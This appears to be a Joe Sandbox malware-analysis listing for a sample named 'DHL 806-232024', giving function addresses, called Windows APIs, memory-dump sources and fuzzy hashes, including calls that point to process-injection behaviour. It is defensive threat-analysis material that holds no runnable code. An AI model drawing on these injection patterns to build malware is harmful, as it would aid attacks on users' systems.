Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 85c61f71104f0d5ab62ce7a26a922b24e14aba1f6e6a09d28934e92e709c11da
Instruction ID: 804764dcfcb74642737a47b672f652d955bfdd014691c4c16d3d3a2adde21946
Opcode Fuzzy Hash: 85c61f71104f0d5ab62ce7a26a922b24e14aba1f6e6a09d28934e92e709c11da
Instruction Fuzzy Hash: E2113675554208BADB218FA5EC40EAAB7A8EF15750F00466AA805E7210D2719E40A761

Function 00E4E278 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00E4EA33
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E4EAC9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E4EAEB

Memory Dump Source

Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
Instruction ID: f292dfcc19eb7915d23852788c29a95478a4363f18ca5ba6305aca86b28cf3c0
Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
Instruction Fuzzy Hash: D462F830A146589BEB24CFA4D850BDEB372FF58304F1091A9E10DEB390E7769E81CB59

Function 009397E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 008D5045: _fseek.LIBCMT ref: 008D505D

Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AAE
Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AC1

_free.LIBCMT ref: 0093992C
_free.LIBCMT ref: 00939933
_free.LIBCMT ref: 0093999E

Part of subcall function 008F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008F9C64), ref: 008F2FA9
Part of subcall function 008F2F95: GetLastError.KERNEL32(00000000,?,008F9C64), ref: 008F2FBB

_free.LIBCMT ref: 009399A6

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: df36c3426dd6e265e1db0e304713de782e3d80129478edafbc75fe112a6d8896
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: 92515EB1904618AFDF249F64DC81BAEBBB9FF48300F0004AEB209A7241DB715E80CF59

Function 008F493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008F49D0
__flush.LIBCMT ref: 008F49F0
__write.LIBCMT ref: 008F4A23
__flsbuf.LIBCMT ref: 008F4A51

Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 9c492d4103b7505e0a8d78f89dd2c50de655089cc70b774ca06f2060912c0b3e
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: E441C57070061E9BDF188E79C88097F7BA6FF80360B24913FEA55C7650EBB09D408B44

Function 008D73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0090EE62
GetOpenFileNameW.COMDLG32(?), ref: 0090EEAC

Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE

Part of subcall function 008F09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F09F4

Strings

X, xrefs: 0090EE7A

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 8e71eafcd0ae34627e50d6f6b0546d80ce5f38a866af76c0b036f12ce0ebbcb1
Instruction ID: f20f1ca4db76897d5304730f72856f8ad31001cd7370065c40b3883f6c1f1a0e
Opcode Fuzzy Hash: 8e71eafcd0ae34627e50d6f6b0546d80ce5f38a866af76c0b036f12ce0ebbcb1
Instruction Fuzzy Hash: 2B21A170A1425C9BCB15AF98C845BEE7BF9EF49314F04401AE508E7381EBB459898BA2

Function 00939B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00939B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00939B99

Strings

aut, xrefs: 00939B93

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 85d74e82d2a72f8069bfe6d069df91298fedd41871929506f221dd923fd8f336
Instruction ID: 7d713f400a7cf7bb8ca1f1ef499c2b876f0a36edd6abc1fc81dbea6d361765be
Opcode Fuzzy Hash: 85d74e82d2a72f8069bfe6d069df91298fedd41871929506f221dd923fd8f336
Instruction Fuzzy Hash: BDD05EBA54430DABDB10ABA0DC0EF9A772CE704705F0042A1BE64961A1DEB055989B92

Function 0094CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2a514e78bdd931951d0de964344d7f71341d022cf2dfd8b95d665415fe981ad
Instruction ID: c426fa78a8d5c027f73e95040b127c105d4ad57b15ecfb5a54c8114e930e8d79
Opcode Fuzzy Hash: e2a514e78bdd931951d0de964344d7f71341d022cf2dfd8b95d665415fe981ad
Instruction Fuzzy Hash: 42F14875A083119FCB14DF28C480A6ABBE5FF88314F14892EF8A99B351D771E945CF82

Function 008D43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008D4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 008D44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 008D44C3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 58cf4007bc612f1ff67f957c9606ea4fa9d1536cdad9934abbc8aa4c75263263
Instruction ID: 97a2ac2ca79ee2514dfde02fcc367ee9c3234bb04eca69b758c1776452713a8d
Opcode Fuzzy Hash: 58cf4007bc612f1ff67f957c9606ea4fa9d1536cdad9934abbc8aa4c75263263
Instruction Fuzzy Hash: 36314F705097018FD720DF28D88469BBBF8FB48318F000A2FE59AC2351D775A984DB96

Function 008F594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 008F5963

Part of subcall function 008FA3AB: __NMSG_WRITE.LIBCMT ref: 008FA3D2
Part of subcall function 008FA3AB: __NMSG_WRITE.LIBCMT ref: 008FA3DC

__NMSG_WRITE.LIBCMT ref: 008F596A

Part of subcall function 008FA408: GetModuleFileNameW.KERNEL32(00000000,009943BA,00000104,?,00000001,00000000), ref: 008FA49A
Part of subcall function 008FA408: ___crtMessageBoxW.LIBCMT ref: 008FA548

Part of subcall function 008F32DF: ___crtCorExitProcess.LIBCMT ref: 008F32E5
Part of subcall function 008F32DF: ExitProcess.KERNEL32 ref: 008F32EE

Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68

RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 39b2f4bb82a2beb44e32d76131c3710f4c4866a8a18e0f4863e56f5effa96b28
Instruction ID: 267b43581e772eea058b6edd5e3d877e34e403b5c0fb46bd1f10c6bc069f6265
Opcode Fuzzy Hash: 39b2f4bb82a2beb44e32d76131c3710f4c4866a8a18e0f4863e56f5effa96b28
Instruction Fuzzy Hash: 2201C031304A1EEEE6293B38EC52B3E7688FF41731F50002AF704DB181DAB09D019262

Function 00939B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009397D2,?,?,?,?,?,00000004), ref: 00939B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00939B5B
CloseHandle.KERNEL32(00000000,?,009397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00939B62

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: d5ad8748ad14edb44c1741664b5ff94e75cb1fd9bd41294965d1635041c41153
Instruction ID: 0b026bda8733539410518e969beec0e764b9bf90ef25af517d3b6b6320f69753
Opcode Fuzzy Hash: d5ad8748ad14edb44c1741664b5ff94e75cb1fd9bd41294965d1635041c41153
Instruction Fuzzy Hash: ACE08632195714B7E7212B55EC09FCA7B28AB05772F104120FB14A90E087B16511A798

Function 00938F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00938FA5

Part of subcall function 008F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008F9C64), ref: 008F2FA9
Part of subcall function 008F2F95: GetLastError.KERNEL32(00000000,?,008F9C64), ref: 008F2FBB

_free.LIBCMT ref: 00938FB6
_free.LIBCMT ref: 00938FC8

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: ad82ae1d5211528b9d835c16876d450dd44d75f72b8f842db3b389858b8bccb7
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: 79E012A16197055ACA34A57CAD44AA367FEFF48350B18081DB509DB142DE24E8418965

Function 008DAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0091002B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: ccb7e54889b67fd43a59e4cd65e873d152ccdfcbd1d8aa03ea817a4301ae4f36
Instruction ID: cdf31fe2089048c69eade474f722ff453aa8c019f67305d46835964a9d4e9476
Opcode Fuzzy Hash: ccb7e54889b67fd43a59e4cd65e873d152ccdfcbd1d8aa03ea817a4301ae4f36
Instruction Fuzzy Hash: 71224B74608255DFCB28DF14C494B6AB7E1FF84314F158A5EE8868B362DB71ED81CB82

Function 008D4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008D4E1A

Strings

EA06, xrefs: 0090DCF5

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 450c053f2aed7301ffaa68db7297d270528c487fa60db1d0f4d198cb9218a413
Instruction ID: 49c95feef1d8db1caec158e6706d9cc864da48a63d2e09aadaf40491cdfcfc64
Opcode Fuzzy Hash: 450c053f2aed7301ffaa68db7297d270528c487fa60db1d0f4d198cb9218a413
Instruction Fuzzy Hash: 77418031A045587BDF115B68C8517BE7F66FF41324F685277E882DB382C5318D4087E2

Function 008D7BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008D7C0B
_memmove.LIBCMT ref: 008D7C76

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
Instruction ID: 9770681d48f4147fe8cdb0b4cc3702650d66cfd662dbfc51cce1ff0595a5570d
Opcode Fuzzy Hash: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
Instruction Fuzzy Hash: A53182B261450AAFC714DF68D8D1E69F3A9FF48324715872AE915CB391EB70E850CB90

Function 008D492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 008D4992

Part of subcall function 008F35AC: __lock.LIBCMT ref: 008F35B2
Part of subcall function 008F35AC: DecodePointer.KERNEL32(00000001,?,008D49A7,009281BC), ref: 008F35BE
Part of subcall function 008F35AC: EncodePointer.KERNEL32(?,?,008D49A7,009281BC), ref: 008F35C9

Part of subcall function 008D4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008D4A73
Part of subcall function 008D4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008D4A88

Part of subcall function 008D3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008D3B7A
Part of subcall function 008D3B4C: IsDebuggerPresent.KERNEL32 ref: 008D3B8C
Part of subcall function 008D3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009962F8,009962E0,?,?), ref: 008D3BFD
Part of subcall function 008D3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 008D3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008D49D2

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 53042549aff3a2d9ac37047317695e162d8a3faf2fd3e1c48f8ab9eae96672c2
Instruction ID: 0b4c13151cb48ec47527f15a3c0446e44e2bbaf1cf6d82b53466e6cb364d21f8
Opcode Fuzzy Hash: 53042549aff3a2d9ac37047317695e162d8a3faf2fd3e1c48f8ab9eae96672c2
Instruction Fuzzy Hash: 661167719283259BC700EF6DE80591AFFE8FB98710F00461BF095C32B2DB709645DB96

Function 008F0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008F594C: __FF_MSGBANNER.LIBCMT ref: 008F5963
Part of subcall function 008F594C: __NMSG_WRITE.LIBCMT ref: 008F596A
Part of subcall function 008F594C: RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F

std::exception::exception.LIBCMT ref: 008F102C
__CxxThrowException@8.LIBCMT ref: 008F1041

Part of subcall function 008F87DB: RaiseException.KERNEL32(?,?,?,0098BAF8,00000000,?,?,?,?,008F1046,?,0098BAF8,?,00000001), ref: 008F8830

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 3c87fdac0f5e377296663bc6637268a89a2478e0f7811c1d7d8515b61c1c8f88
Instruction ID: f17dee6cb09c5631cc56c86a9667e9efc22fd272c54adccbe2fb37f1ce411f16
Opcode Fuzzy Hash: 3c87fdac0f5e377296663bc6637268a89a2478e0f7811c1d7d8515b61c1c8f88
Instruction Fuzzy Hash: E4F0863550471DE6CB24BB78EC159FE77A8FF40351F100415FA04D5691EFB18A808691

Function 008F55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68

__lock_file.LIBCMT ref: 008F561B

Part of subcall function 008F6E4E: __lock.LIBCMT ref: 008F6E71

__fclose_nolock.LIBCMT ref: 008F5626

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 283fd6977afd8f2b5d601dbe6c9ae0e727cfd2a1b2f1e0715889c7f9dc4c4c20
Instruction ID: be5b2b68dfdc3f33d9985655f70bccd93ae7edaa6416f3df4c797a428b5d23ad
Opcode Fuzzy Hash: 283fd6977afd8f2b5d601dbe6c9ae0e727cfd2a1b2f1e0715889c7f9dc4c4c20
Instruction Fuzzy Hash: BCF09071900A0CDADB20BF7D880277E67A1FF51734F658209A764EB1C1DF7C89019B56

Function 00E4E275 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00E4EA33
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E4EAC9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E4EAEB

Memory Dump Source

Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: 199fafd62ec98b1d18a887e07c0f95f875e3450e60f60847aeae82fbedd23272
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: 7D12CE24E14658C6EB24DF64D8507DEB232FF68300F10A0E9910DEB7A5E77A4E81CF5A

Function 008F0E48 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 008F0EF7

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
